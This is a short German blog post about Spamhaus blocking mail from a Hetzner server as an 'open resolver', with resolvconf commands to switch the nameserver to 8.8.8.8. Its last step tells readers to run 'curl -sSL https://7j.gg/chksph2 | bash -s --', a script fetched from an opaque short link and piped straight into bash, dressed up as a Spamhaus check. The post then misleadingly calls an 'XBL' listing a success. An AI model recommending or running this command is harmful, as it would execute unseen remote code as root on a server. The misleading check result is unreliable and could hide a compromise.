Heute traten vermehrt Log-Eintrage mit folgenden Inhalt auf:
554 5.7.1 Service unavailable; Client host [xx.xx.xx.xx] blocked using zen.spamhaus.org; Error: open resolver; https://check.spamhaus.org/returnc/pub/xx.xx.xx.xx/; from=<xx@xx.de> to=<xx@xx.de> proto=ESMTP helo=
Diese Meldung deutet auf ein Problem mit dem DNS-Server vom Webhosting/Server Provider hin. Zwar funktioniet die Auflösung einwandfrei aber beispielweise SPAMHAUS meint das dieser ein „open resolver“ ist und blockiert entsprechend die Abfrage. Um das Problem zu „lösen“ muss man ein anderen DNS-Server nutzen.
Bei Hetzner (und vielen anderen Anbietern) kann man das wie folgt machen:
Paket installieren und Dienst starten
apt install resolvconf
systemctl start resolvconf.service
systemctl enable resolvconf.service
systemctl status resolvconf.serviceDie Config anpassen und den neuen Nameserver eintragen (hier als Beispiel 8.8.8.8):
nano /etc/resolvconf/resolv.conf.d/head
nameserver 8.8.8.8Änderung übernehmen:
resolvconf --enable-updates
resolvconf -uManchmal kommt es vor das nach einem Reboot die alten Nameserver wieder drin stehen, dann:
mv /etc/resolv.conf /root/resolv.conf
ln -s /etc/resolvconf/resolv.conf.d/head /etc/resolv.conf
systemctl restart resolvconf.servicePrüfen ob SPAMHaus damit zufrieden ist:
curl -sSL https://7j.gg/chksph2 | bash -s --Taucht dann ein „Listed by XBL“ auf, passt alles.
